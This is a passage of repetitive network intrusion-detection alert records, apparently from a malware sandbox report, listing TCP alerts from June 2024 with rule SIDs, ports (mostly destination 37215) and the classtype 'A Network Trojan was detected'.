                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.684821
                SID:2835222
                Source Port:41850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.579346
                SID:2840516
                Source Port:23
                Destination Port:38724
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.759298
                SID:2835222
                Source Port:57362
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.024652
                SID:2829579
                Source Port:43096
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.807103
                SID:2835222
                Source Port:51094
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.112114
                SID:2835222
                Source Port:45046
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.422821
                SID:2835222
                Source Port:52778
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.019701
                SID:2835222
                Source Port:35912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.367119
                SID:2835222
                Source Port:34218
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.450492
                SID:2829579
                Source Port:54562
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.967213
                SID:2829579
                Source Port:57630
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.472646
                SID:2829579
                Source Port:60244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.845894
                SID:2829579
                Source Port:54050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.198587
                SID:2835222
                Source Port:59388
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662674
                SID:2835222
                Source Port:40518
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.470511
                SID:2829579
                Source Port:44524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.979020
                SID:2829579
                Source Port:60654
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.409468
                SID:2829579
                Source Port:53228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.294977
                SID:2835222
                Source Port:33122
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.092450
                SID:2835222
                Source Port:35102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.828371
                SID:2835222
                Source Port:33498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.115650
                SID:2835222
                Source Port:38306
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.804945
                SID:2835222
                Source Port:45254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.676448
                SID:2835222
                Source Port:41148
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.294263
                SID:2829579
                Source Port:41204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.471305
                SID:2829579
                Source Port:41794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.878177
                SID:2835222
                Source Port:33496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.565397
                SID:2829579
                Source Port:38040
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.177940
                SID:2835222
                Source Port:52814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.030073
                SID:2835222
                Source Port:53530
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.277492
                SID:2835222
                Source Port:33998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.029377
                SID:2835222
                Source Port:52848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.289799
                SID:2835222
                Source Port:50670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.424281
                SID:2835222
                Source Port:60892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.288962
                SID:2829579
                Source Port:52726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.033817
                SID:2829579
                Source Port:47064
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.028743
                SID:2835222
                Source Port:41582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.055414
                SID:2829579
                Source Port:52018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.687257
                SID:2829579
                Source Port:47504
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.017191
                SID:2835222
                Source Port:37278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.366309
                SID:2835222
                Source Port:43276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.999650
                SID:2829579
                Source Port:45748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.025011
                SID:2835222
                Source Port:58518
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.277626
                SID:2829579
                Source Port:56708
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.406833
                SID:2829579
                Source Port:48650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.033865
                SID:2835222
                Source Port:49154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.323458
                SID:2835222
                Source Port:47062
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.915635
                SID:2835222
                Source Port:54566
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.977956
                SID:2829579
                Source Port:48650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.845845
                SID:2829579
                Source Port:34068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.716913
                SID:2829579
                Source Port:32870
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.900139
                SID:2835222
                Source Port:34506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.733160
                SID:2829579
                Source Port:46786
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.181849
                SID:2829579
                Source Port:38214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.682872
                SID:2835222
                Source Port:34558
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.165061
                SID:2829579
                Source Port:55152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.789705
                SID:2829579
                Source Port:34522
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.032689
                SID:2829579
                Source Port:36032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.828344
                SID:2835222
                Source Port:49220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.073823
                SID:2829579
                Source Port:47380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.150619
                SID:2835222
                Source Port:44772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.719002
                SID:2829579
                Source Port:59852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.967799
                SID:2829579
                Source Port:33046
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.295392
                SID:2835222
                Source Port:41242
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.381511
                SID:2835222
                Source Port:37158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.679561
                SID:2835222
                Source Port:46000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.828476
                SID:2829579
                Source Port:58488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.050972
                SID:2835222
                Source Port:51476
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.051318
                SID:2835222
                Source Port:39326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.382553
                SID:2829579
                Source Port:46664
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.806126
                SID:2829579
                Source Port:58398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.073605
                SID:2829579
                Source Port:36140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.944527
                SID:2829579
                Source Port:51462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.276208
                SID:2829579
                Source Port:59464
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.368830
                SID:2829579
                Source Port:40120
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.849639
                SID:2835222
                Source Port:38596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.323300
                SID:2835222
                Source Port:53394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.716065
                SID:2829579
                Source Port:54754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.581170
                SID:2835222
                Source Port:40876
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.734915
                SID:2835222
                Source Port:56272
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.547614
                SID:2835222
                Source Port:49754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.272935
                SID:2829579
                Source Port:47476
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.028073
                SID:2835222
                Source Port:55476
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.290118
                SID:2835222
                Source Port:39286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.777108
                SID:2829579
                Source Port:55416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.827381
                SID:2829579
                Source Port:34948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.906394
                SID:2829579
                Source Port:53022
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.344508
                SID:2829579
                Source Port:36012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.503060
                SID:2829579
                Source Port:33778
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.791164
                SID:2829579
                Source Port:54432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.242238
                SID:2835222
                Source Port:40320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.001937
                SID:2829579
                Source Port:60082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.812797
                SID:2835222
                Source Port:55934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.051125
                SID:2829579
                Source Port:42686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.565530
                SID:2835222
                Source Port:54892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.677576
                SID:2835222
                Source Port:53932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.133642
                SID:2835222
                Source Port:38632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.980776
                SID:2829579
                Source Port:45004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.671748
                SID:2829579
                Source Port:53184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.699039
                SID:2835222
                Source Port:37730
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.324336
                SID:2835222
                Source Port:36080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.811821
                SID:2829579
                Source Port:46080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.341340
                SID:2829579
                Source Port:44878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.776907
                SID:2835222
                Source Port:57276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.614009
                SID:2829579
                Source Port:47138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.568407
                SID:2829579
                Source Port:40262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.807605
                SID:2829579
                Source Port:57288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.829204
                SID:2829579
                Source Port:57716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.088890
                SID:2835222
                Source Port:40734
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.148904
                SID:2829579
                Source Port:57528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.290951
                SID:2835222
                Source Port:37888
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.717023
                SID:2835222
                Source Port:53514
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.186684
                SID:2835222
                Source Port:53156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.226670
                SID:2835222
                Source Port:36966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.968826
                SID:2829579
                Source Port:54434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.228778
                SID:2829579
                Source Port:45802
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.900009
                SID:2829579
                Source Port:36934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.978376
                SID:2835222
                Source Port:42054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663249
                SID:2829579
                Source Port:58234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.760243
                SID:2829579
                Source Port:49000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.072495
                SID:2829579
                Source Port:53640
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.408602
                SID:2835222
                Source Port:50096
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.660597
                SID:2835222
                Source Port:48092
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.472203
                SID:2829579
                Source Port:42500
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.075140
                SID:2835222
                Source Port:42454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.701389
                SID:2829579
                Source Port:56232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.056458
                SID:2835222
                Source Port:36448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.051362
                SID:2829579
                Source Port:47012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.896548
                SID:2829579
                Source Port:41430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.227154
                SID:2829579
                Source Port:59422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.055116
                SID:2829579
                Source Port:55202
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.132670
                SID:2829579
                Source Port:42104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.942557
                SID:2835222
                Source Port:47390
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.151221
                SID:2835222
                Source Port:36018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.250795
                SID:2835222
                Source Port:51294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.643877
                SID:2829579
                Source Port:58758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.277985
                SID:2829579
                Source Port:35974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.150100
                SID:2835222
                Source Port:43702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.011347
                SID:2835222
                Source Port:51200
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.977482
                SID:2835222
                Source Port:45014
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.810632
                SID:2835222
                Source Port:36998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.646637
                SID:2829579
                Source Port:48538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.568259
                SID:2835222
                Source Port:59862
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.625526
                SID:2835222
                Source Port:35272
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.029490
                SID:2835222
                Source Port:37892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.409995
                SID:2835222
                Source Port:41374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.917334
                SID:2835222
                Source Port:43220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.681592
                SID:2835222
                Source Port:42272
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.877613
                SID:2835222
                Source Port:35590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.177716
                SID:2835222
                Source Port:35908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.965814
                SID:2829579
                Source Port:55522
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.149059
                SID:2829579
                Source Port:54672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.998270
                SID:2835222
                Source Port:55348
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.018051
                SID:2829579
                Source Port:49192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.421999
                SID:2829579
                Source Port:52370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662099
                SID:2829579
                Source Port:32894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.715906
                SID:2835222
                Source Port:50432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.071038
                SID:2829579
                Source Port:54356
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.275326
                SID:2835222
                Source Port:55152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.424353
                SID:2829579
                Source Port:37628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.684168
                SID:2835222
                Source Port:41994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.382903
                SID:2829579
                Source Port:55750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.517229
                SID:2829579
                Source Port:50726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.503988
                SID:2835222
                Source Port:43166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.145564
                SID:2829579
                Source Port:54038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.860060
                SID:2835222
                Source Port:51216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.998088
                SID:2835222
                Source Port:34194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.701611
                SID:2835222
                Source Port:47080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.779570
                SID:2835222
                Source Port:47332
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.338556
                SID:2835222
                Source Port:38672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.471719
                SID:2835222
                Source Port:40044
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.992211
                SID:2835222
                Source Port:34702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.666865
                SID:2835222
                Source Port:45230
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.682177
                SID:2829579
                Source Port:46406
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134710
                SID:2835222
                Source Port:49794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.882774
                SID:2835222
                Source Port:57072
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.761593
                SID:2835222
                Source Port:48094
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.790535
                SID:2829579
                Source Port:42060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.230646
                SID:2829579
                Source Port:59688
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.859504
                SID:2835222
                Source Port:51938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.989965
                SID:2835222
                Source Port:53396
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.322126
                SID:2829579
                Source Port:47460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.051065
                SID:2835222
                Source Port:36800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.940477
                SID:2829579
                Source Port:35386
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.616866
                SID:2835222
                Source Port:48260
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.110762
                SID:2829579
                Source Port:38588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.159804
                SID:2835222
                Source Port:43732
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.857938
                SID:2835222
                Source Port:60778
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.717019
                SID:2835222
                Source Port:59488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.001039
                SID:2835222
                Source Port:42286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.179038
                SID:2829579
                Source Port:39996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.050884
                SID:2829579
                Source Port:54310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.917090
                SID:2829579
                Source Port:33748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.549338
                SID:2829579
                Source Port:51044
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.624517
                SID:2835222
                Source Port:59612
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.148842
                SID:2829579
                Source Port:40374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.661710
                SID:2835222
                Source Port:57034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
